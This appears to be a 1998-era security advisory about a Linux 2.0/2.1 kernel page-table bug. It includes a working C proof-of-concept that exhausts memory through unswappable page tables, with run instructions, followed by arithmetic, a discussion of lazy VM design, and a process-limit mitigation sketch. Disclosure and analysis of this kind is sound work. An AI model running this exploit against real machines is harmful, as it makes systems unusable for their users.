COMMAND
PTE
SYSTEMS AFFECTED
Linux 2.0.x, 2.1.?
PROBLEM
Sed found the following. The idea is to consume a lot of memory by
touching every region of our virtual address space, which forces the
kernel to allocate every page table the process can have (this is on
a PC, i.e. i386). The process ends up holding 768 pages of page
tables that will never be swapped out (that is the crucial point).
The attack is simple: run the program below as many times as needed
to take all the memory, and the PC becomes unusable (on the 64 MB
box tested, about 20 instances were enough). You then get a
wonderful light show from the HD LED, as the PC spends all its
time swapping. Exploit follows:
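/* the pte bug - Sed hacking linux kernel, 24 may 1998 */
#include <stdio.h>      /* perror */
#include <stdlib.h>     /* exit */
#include <signal.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

unsigned long address;            /* address currently being probed */
volatile sig_atomic_t touch_me;   /* set when the handler mapped a page */
int fd;                           /* file backing the temporary mappings */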
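/* SIGSEGV handler: map one page at the faulting address so that the
 * read in main() succeeds when it is restarted. */
void the_handler(int x)
{
    signal(SIGSEGV, the_handler);
    touch_me++;
    if (mmap((void *)address, 4, PROT_READ,
             MAP_FIXED|MAP_PRIVATE, fd, 0) == (void *)-1) {
        perror("mmap");
        exit(1);
    }
}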
int main(void)
{
    /* volatile to fool GCC, we _WANT_ access *address */
    volatile unsigned long i;

    fd = open("pte.c", O_RDONLY);
    if (fd == -1) {
        perror("open");
        exit(1);
    }
    signal(SIGSEGV, the_handler);
    /* 0xC0000000 (3*1024*1024*1024) = TASK_SIZE; written as an unsigned
     * constant because the product overflows a 32-bit int.
     * 1024*4096 = number of bytes one page table can map */
    for (address = 0; address < 0xC0000000UL; address += 1024*4096) {
        i = *(unsigned long *)address;
        if (touch_me) {
            /* drop the page; the page table allocated for it remains */
            touch_me = 0;
            munmap((void *)address, 4);
        }
    }
    while (1)
        pause();
}
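The figures quoted above (768 pages per process, about 20 runs on a
64 MB box) can be checked with a little arithmetic. The sketch below
assumes the usual i386 layout: 4 KB pages, 1024 entries per page table,
and 3 GB of user space. The macro and function names are made up for
this illustration and do not come from the kernel source.

```c
/* Assumed i386 constants (illustrative names, not kernel identifiers). */
#define USER_SPACE_BYTES 0xC0000000UL  /* TASK_SIZE: 3 GB of user space   */
#define PAGE_BYTES       4096UL        /* one page; a page table is one page */
#define PTES_PER_TABLE   1024UL        /* entries in one page table       */

/* Number of page tables needed to cover the whole user address space. */
unsigned long tables_per_process(void)
{
    return USER_SPACE_BYTES / (PTES_PER_TABLE * PAGE_BYTES);
}

/* Unswappable memory, in KB, pinned by nprocs copies of the program. */
unsigned long pinned_kb(unsigned long nprocs)
{
    return nprocs * tables_per_process() * PAGE_BYTES / 1024UL;
}
```

Under these assumptions tables_per_process() is 768, one process pins
3072 KB (3 MB), and pinned_kb(20) is 61440 KB (60 MB), which is
consistent with a 64 MB machine being exhausted after about 20 runs.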
SOLUTION
We could swap the pgd / pmd / pte, but the real question is whether
that is feasible, or whether you would rather have something like
lazy page table allocation.
The Linux VM code has a "flat" model, whereas Mach VM (the basis
of the VM system used by 4.4BSD and its derivatives) and UVM
(NetBSD's new VM system) have a 2-layer model; the upper layer
holds mappings that can coalesce to save space, and the lower
layer holds the (redundant) physical mappings (in the format used
by the MMU/software TLB reload engine/whatever). This lower layer
is able to allocate page tables or other physical mapping
resources "lazily", as mappings for actual physical pages are
entered by the upper layer. This lower layer is also free to
"forget" mappings at any time, so when memory is in extremely
short supply, the page tables can simply be freed to the system
(and that process's page table base pointer set to some default
empty page table), and when that process runs again, the mappings
are simply rebuilt as the page faults occur from the (compact)
info stored in the upper layer.
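The two-layer idea described above can be illustrated with a toy
model. This is only a sketch, not code from Mach, UVM, or Linux: all
names (toy_region, toy_pmap, toy_fault, toy_forget) and sizes are
invented, and a single region stands in for the whole upper layer.
It shows the lower layer allocating tables lazily on a fault and
being thrown away and rebuilt without losing information.

```c
#include <stdlib.h>

#define TOY_TABLES   768   /* slots in the toy page directory */
#define TOY_ENTRIES 1024   /* entries per toy page table      */

/* Upper layer: one compact record describes a whole mapped range. */
struct toy_region { unsigned long first_page, npages; };

/* Lower layer: page tables allocated on demand, freeable at any time. */
struct toy_pmap { unsigned char *table[TOY_TABLES]; int live_tables; };

/* Simulated page fault: consult the upper layer, then enter the
 * mapping in the lower layer, allocating its page table lazily.
 * Returns 0 on success, -1 if the page is unmapped or memory is out. */
int toy_fault(struct toy_pmap *pm, const struct toy_region *r,
              unsigned long page)
{
    unsigned long dir = page / TOY_ENTRIES;

    if (page < r->first_page || page - r->first_page >= r->npages ||
        dir >= TOY_TABLES)
        return -1;
    if (pm->table[dir] == NULL) {
        pm->table[dir] = calloc(TOY_ENTRIES, 1);
        if (pm->table[dir] == NULL)
            return -1;
        pm->live_tables++;
    }
    pm->table[dir][page % TOY_ENTRIES] = 1;   /* mark entry present */
    return 0;
}

/* Memory pressure: forget every lower-layer mapping. Nothing is lost,
 * because the upper layer still describes the region. */
void toy_forget(struct toy_pmap *pm)
{
    for (int i = 0; i < TOY_TABLES; i++) {
        free(pm->table[i]);
        pm->table[i] = NULL;
    }
    pm->live_tables = 0;
}
```

In this model a process that touches one page in each 4 MB slot still
ends up with many tables, but toy_forget() can reclaim all of them,
and the next toy_fault() on a valid page simply rebuilds what is
needed.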
setrlimit() memory limits will not prevent this. You can only limit
the number of processes a user can launch, which limits the havoc
they can cause. The bug stems from the way Linux manages PGD,
PMD, and PTE structures. At this time, Linux deallocates PTEs only
when it frees page ranges; PMD and PGD structures are not checked
for remaining use when entries are freed from them.
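As a stopgap, the per-user process limit mentioned above could be
lowered before user code runs (for example from a login wrapper).
The following is a minimal sketch, assuming a system that provides
RLIMIT_NPROC (a Linux/BSD extension, not part of POSIX); the function
name cap_process_count is made up for this example. It bounds the
damage only: each allowed process can still pin its page tables.

```c
#include <sys/time.h>
#include <sys/resource.h>

/* Lower the process-count limit of the calling user to at most
 * max_procs. Limits are only lowered, never raised.
 * Returns 0 on success, -1 on error (errno is set by the failing call). */
int cap_process_count(rlim_t max_procs)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_NPROC, &rl) == -1)
        return -1;
    /* Hard limit: an unprivileged process may lower it but not raise it. */
    if (rl.rlim_max == RLIM_INFINITY || rl.rlim_max > max_procs)
        rl.rlim_max = max_procs;
    /* Soft limit must not exceed the hard limit. */
    if (rl.rlim_cur == RLIM_INFINITY || rl.rlim_cur > rl.rlim_max)
        rl.rlim_cur = rl.rlim_max;
    return setrlimit(RLIMIT_NPROC, &rl);
}
```

The limit is inherited by child processes, so it should be applied
before handing control to the user's shell. With roughly 3 MB of page
tables per process on i386, the value chosen should be weighed
against the amount of physical memory in the machine.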
Perry Harrington is working on a patch against 2.1 series kernels,
which will be backported to the 2.0 series.